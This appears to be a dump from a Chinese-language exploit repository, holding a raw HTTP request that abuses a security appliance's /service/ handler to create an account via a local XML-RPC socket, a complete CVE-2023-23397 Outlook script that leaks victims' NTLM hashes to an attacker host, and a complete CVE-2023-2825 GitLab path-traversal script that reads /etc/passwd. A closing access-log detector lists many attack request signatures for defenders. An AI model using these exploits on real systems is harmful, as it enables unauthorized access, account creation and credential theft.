The `/service/` handler forwards the request body to the backend named in the query string; `unix:/../../../../var/run/rpc/xmlrpc.sock` points it at the local XML-RPC socket, whose `web.user_add` method then creates an account (`test` / `1qaz@3edC12345`, role id 102). The XML-RPC envelope below is restored around the field values that survived in the original note; treat the exact nesting and value types as an assumption.

```
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host:
Cookie: LANG=zh; DBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<?xml version="1.0"?>
<methodCall>
  <methodName>web.user_add</methodName>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value><string>admin</string></value>
            <value><string>5</string></value>
            <value><string>10.0.0.1</string></value>
          </data>
        </array>
      </value>
    </param>
    <param>
      <value>
        <struct>
          <member><name>uname</name><value><string>test</string></value></member>
          <member><name>name</name><value><string>test</string></value></member>
          <member><name>pwd</name><value><string>1qaz@3edC12345</string></value></member>
          <member><name>authmode</name><value><string>1</string></value></member>
          <member><name>deptid</name><value><string></string></value></member>
          <member><name>email</name><value><string></string></value></member>
          <member><name>mobile</name><value><string></string></value></member>
          <member><name>comment</name><value><string></string></value></member>
          <member><name>roleid</name><value><string>102</string></value></member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
```

--------------------------------------------------------------------------------
/Microsoft Outlook 提权漏洞.md:
--------------------------------------------------------------------------------
## CVE-2023-23397

### Affected versions
- Microsoft Outlook 2013 Service Pack 1 (32-bit and 64-bit editions)
- Microsoft Outlook 2013 RT Service Pack 1
- Microsoft Outlook 2016 (32-bit and 64-bit editions)
- Microsoft Office 2019 (32-bit and 64-bit editions)
- Microsoft Office LTSC 2021 (32-bit and 64-bit editions)
- Microsoft 365 Apps for Enterprise (32-bit and 64-bit systems)

### Usage
1. Install pywin32: `pip install pywin32`
2. Start an SMB listener on the attacker machine, for example Metasploit's SMB capture module, to receive the victim's NTLM authentication.
3. Run `python Exploit.py <save|send> <target e-mail> <attacker host>` on a Windows machine with Outlook installed; the script drives the local Outlook through COM, either saving the meeting request to `malicious.msg` or sending it directly.

```
#!/usr/bin/python3
# PoC for CVE-2023-23397 v1.2
# Copyright (C) 2022 - Gianluca Tiepolo, Maria Saleri
#
# https://github.com/tiepologian/CVE-2023-23397/blob/main/Exploit.py
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Usage: python Exploit.py <save|send> <target e-mail> <attacker host>

import datetime
import os
import sys

import win32com.client  # pip install pywin32; needs a local Outlook installation


def saveMail(appt):
    """Write the appointment to malicious.msg for delivery by other means."""
    exportPath = 'malicious.msg'
    appt.SaveAs(os.path.abspath(exportPath))
    print("[*] Finished, saved to", os.path.abspath(exportPath))


def sendMail(appt):
    """Send the meeting request through the local Outlook profile."""
    appt.Send()
    print("[*] Finished, e-mail sent!")


def generateMail(cmd, target, c2):
    outlook = win32com.client.Dispatch("Outlook.Application")
    appt = outlook.CreateItem(1)  # olAppointmentItem
    print("[*] Generating malicious e-mail...")
    output_date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
    appt.Start = output_date  # yyyy-MM-dd hh:mm
    appt.AllDayEvent = True
    appt.Subject = "Testing CVE-2023-23397"
    appt.body = "Thank you for your hash!"
    appt.Location = "TeamRocket"
    appt.MeetingStatus = 1  # olMeeting: turns the appointment into a meeting request
    appt.Recipients.Add(target)
    appt.ReminderOverrideDefault = True
    appt.ReminderPlaySound = True
    # PidLidReminderFileParameter: a UNC path makes the victim's Outlook open it
    # over SMB when the reminder fires, sending its Net-NTLMv2 response to c2.
    appt.ReminderSoundFile = "\\\\" + c2
    if cmd == "save":
        saveMail(appt)
    elif cmd == "send":
        sendMail(appt)
    else:
        print("[!] Unrecognized command, exiting...")
        sys.exit(1)


def main():
    if len(sys.argv) != 4:
        print("Usage: python Exploit.py <save|send> <target e-mail> <attacker host>")
        sys.exit(0)
    print('[*] CVE-2023-23397 v1.2 by Tiepolo G, Saleri M')
    generateMail(sys.argv[1], sys.argv[2], sys.argv[3])


if __name__ == "__main__":
    main()
```

--------------------------------------------------------------------------------
/GitLab目录遍历漏洞.md:
--------------------------------------------------------------------------------
## GitLab directory traversal (CVE-2023-2825)
When an attachment exists in a public project nested at least five groups deep, an unauthenticated attacker can use a path traversal to read arbitrary files on the server.

### Affected versions
GitLab Community Edition (CE) and Enterprise Edition (EE) 16.0.0

The script logs in (an account is needed to create the nested groups and upload an attachment; `root`/`toor` are placeholders to replace), creates eleven nested public groups and a public project, uploads a file, and then fetches `/etc/passwd` through the traversal in the upload URL. Dependencies: `requests`, `beautifulsoup4`.

```
# CVE-2023-2825 - GitLab Unauthenticated arbitrary file read
# Released by OccamSec on 2023.05.25
#
# OccamSec Blog: https://occamsec.com/exploit-for-cve-2023-2825/
# Vendor advisory: https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
#
# This Proof Of Concept leverages a path traversal vulnerability
# to retrieve the /etc/passwd file from a system running GitLab 16.0.0.
#

import requests
import random
import string
from urllib.parse import urlparse
from bs4 import BeautifulSoup


ENDPOINT = "https://gitlab.example.com"
USERNAME = "root"
PASSWORD = "toor"

# Session for cookies
session = requests.Session()

# CSRF token
csrf_token = ""

# Ignore invalid SSL
requests.urllib3.disable_warnings()


def request(method, path, data=None, files=None, headers=None):
    """Send one request on the shared session and refresh the CSRF token
    from any HTML response, so the next POST carries a valid token."""
    global csrf_token

    if method == "POST" and isinstance(data, dict):
        data["authenticity_token"] = csrf_token

    response = session.request(
        method,
        f"{ENDPOINT}{path}",
        data=data,
        files=files,
        headers=headers,
        verify=False,
    )
    if response.status_code != 200:
        print(response.text)
        print(f"[*] Request failed: {method} - {path} => {response.status_code}")
        exit(1)

    if response.headers["content-type"].startswith("text/html"):
        csrf_token = BeautifulSoup(response.text, "html.parser").find(
            "meta", {"name": "csrf-token"}
        )["content"]

    return response


# Get initial CSRF token
request("GET", "")

# Login
print("[*] Attempting to login...")
request(
    "POST",
    "/users/sign_in",
    data={"user[login]": USERNAME, "user[password]": PASSWORD},
)

print(f"[*] Login successful as user '{USERNAME}'")


# Create groups (eleven levels; the bug needs at least five)
group_prefix = "".join(random.choices(string.ascii_uppercase + string.digits, k=3))
print(f"[*] Creating 11 groups with prefix {group_prefix}")

parent_id = ""
for i in range(1, 12):
    # Create group
    name = f"{group_prefix}-{i}"
    create_resp = request(
        "POST",
        "/groups",
        data={
            "group[parent_id]": parent_id,
            "group[name]": name,
            "group[path]": name,
            "group[visibility_level]": 20,
            "user[role]": "software_developer",
            "group[jobs_to_be_done]": "",
        },
    )

    # Get group id
    parent_id = BeautifulSoup(create_resp.text, "html.parser").find(
        "button", {"title": "Copy group ID"}
    )["data-clipboard-text"]

    print(f"[*] Created group '{name}'")

# Create project
project_resp = request(
    "POST",
    "/projects",
    data={
        "project[ci_cd_only]": "false",
        "project[name]": "CVE-2023-2825",
        "project[selected_namespace_id]": parent_id,
        "project[namespace_id]": parent_id,
        "project[path]": "CVE-2023-2825",
        "project[visibility_level]": 20,
        "project[initialize_with_readme]": 1,
    },
)
repo_path = urlparse(project_resp.url).path
print(f"[*] Created public repo '{repo_path}'")

# Upload file
file_resp = request(
    "POST",
    f"/{repo_path}/uploads",
    files={"file": "hello world"},
    headers={"X-CSRF-Token": csrf_token},
)
file_url = file_resp.json()["link"]["url"]
print(f"[*] Uploaded file '{file_url}'")

# Get /etc/passwd
exploit_path = f"/{repo_path}{file_url.split('file')[0]}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
print(f"[*] Executing exploit, fetching file '/etc/passwd': GET - {exploit_path}")
exploit_resp = request("GET", exploit_path)
print(f"\n{exploit_resp.text}")

```

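Most of the requests in this repository are visible in an ordinary web-server access log, which makes them cheap to hunt for during an exercise. The following is an added example, not part of the repository, that scans combined-format log lines for the method, path and query-parameter names of the documented requests and, separately, for any path traversal after percent-decoding (one rule covers the GitLab `..%2f` form, the 海康威视 `..;/` access path and the 锐捷 `uploadDir=../../321` parameter). Body-only indicators (the T-SQL in the 金和 and KSOA bodies, the 深X服 `clsMode` value, the DWR batch) are deliberately left out because they never reach the access log. The sample log lines, IPs and timestamps are constructed for the demo.

```python
"""Access-log triage for the request signatures collected in this repo.

Added example, not part of the repository.  Signatures are the method,
path and query-parameter names of the requests documented above; body
content is not visible in an access log, so body-only indicators are
left out.  The sample log lines are constructed for the demo.
"""
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import parse_qs, unquote

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass(frozen=True)
class Signature:
    label: str
    method: str
    path: str                              # compared with the decoded path
    query_keys: frozenset = frozenset()    # all of these must be present
    needle: str = ""                       # optional substring of the decoded target


SIGNATURES = [
    Signature("汉得SRM tomcat.jsp login bypass", "GET", "/tomcat.jsp", frozenset({"dataName", "dataValue"})),
    Signature("网神 SecSSL changepass.php", "POST", "/changepass.php", frozenset({"type"})),
    Signature("锐捷 NBR fileupload.php", "POST", "/ddi/server/fileupload.php", frozenset({"uploadDir", "name"})),
    Signature("蓝凌OA custom.jsp", "POST", "/sys/ui/extend/varkind/custom.jsp"),
    Signature("金和OA GetSqlData.aspx", "POST", "/C6/Control/GetSqlData.aspx/.ashx"),
    Signature("绿盟 SAS GetFile", "GET", "/webconf/GetFile/index", frozenset({"path"})),
    Signature("绿盟 SAS Exec", "GET", "/webconf/Exec/index", frozenset({"cmd"})),
    Signature("绿盟 SAS local_user.php", "GET", "/api/virtual/home/status", frozenset({"cat"})),
    Signature("泛微 E-Cology DWR SQLi", "POST", "/dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr"),
    Signature("用友 NC Cloud jsinvoke", "POST", "/uapjs/jsinvoke/", frozenset({"action"})),
    Signature("海康威视 files upload", "POST", "/center/api/files;.html"),
    Signature("海康威视 report upload", "POST", "/svm/api/external/report"),
    Signature("通达OA delete_seal.php", "GET", "/general/system/seal_manage/iweboffice/delete_seal.php", frozenset({"DELETE_STR"})),
    Signature("通达OA delete_log.php", "GET", "/general/system/seal_manage/dianju/delete_log.php", frozenset({"DELETE_STR"})),
    Signature("Metabase /api/setup/validate", "POST", "/api/setup/validate"),
    Signature("安恒 明御 xmlrpc.sock", "POST", "/service/", needle="xmlrpc.sock"),
]


def has_traversal(path: str, qs: Dict[str, List[str]]) -> bool:
    """True when a path or query-value segment is '..' or starts with '..;'."""
    pieces = path.split("/")
    for values in qs.values():
        for v in values:
            pieces.extend(v.split("/"))
    return any(p == ".." or p.startswith("..;") for p in pieces)


def scan_line(line: str) -> List[Dict[str, str]]:
    """Return one finding per matched rule for a single log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method, target = m["method"], m["target"]
    raw_path, _, raw_query = target.partition("?")
    path = unquote(raw_path)
    qs = parse_qs(raw_query, keep_blank_values=True)  # decodes the values too
    labels = [
        s.label for s in SIGNATURES
        if s.method == method and s.path == path
        and s.query_keys <= set(qs)
        and (not s.needle or s.needle in unquote(target))
    ]
    if has_traversal(path, qs):
        labels.append("path traversal")
    return [{"ip": m["ip"], "ts": m["ts"], "label": lab, "target": target} for lab in labels]


def scan(lines: List[str]) -> List[Dict[str, str]]:
    return [hit for line in lines for hit in scan_line(line)]


# Constructed sample log (IPs, timestamps and sizes are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2023:10:01:02 +0800] "GET /tomcat.jsp?dataName=role_id&dataValue=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Aug/2023:10:01:03 +0800] "GET /webconf/Exec/index?cmd=whoami HTTP/1.1" 200 13 "-" "curl/7.88.1"
10.0.0.6 - - [12/Aug/2023:10:01:04 +0800] "GET /g1/g2/g3/g4/g5/CVE-2023-2825/uploads/0123456789abcdef/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1234 "-" "python-requests/2.31.0"
10.0.0.7 - - [12/Aug/2023:10:01:05 +0800] "POST /center/api/files;.html HTTP/1.1" 200 80 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Aug/2023:10:01:06 +0800] "GET /portal/ui/login/..;/..;/new.jsp HTTP/1.1" 200 40 "-" "Mozilla/5.0"
10.0.0.8 - - [12/Aug/2023:10:01:07 +0800] "POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1" 200 20 "-" "Mozilla/5.0"
192.168.1.20 - - [12/Aug/2023:10:01:08 +0800] "GET /index.php?page=home HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Aug/2023:10:01:09 +0800] "POST /api/setup/validate HTTP/1.1" 400 60 "-" "python-requests/2.31.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f"{hit['ip']:<14} {hit['label']:<36} {hit['target']}")
```

The 锐捷 line produces two findings (the product rule and the generic traversal rule), which is intended: the generic rule keeps working for the next product whose upload handler takes a directory parameter, while the product rule gives the analyst the name to search this repository for. Feed real logs in with `scan(open(path).read().splitlines())` and pivot on `ip` and `ts`.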
--------------------------------------------------------------------------------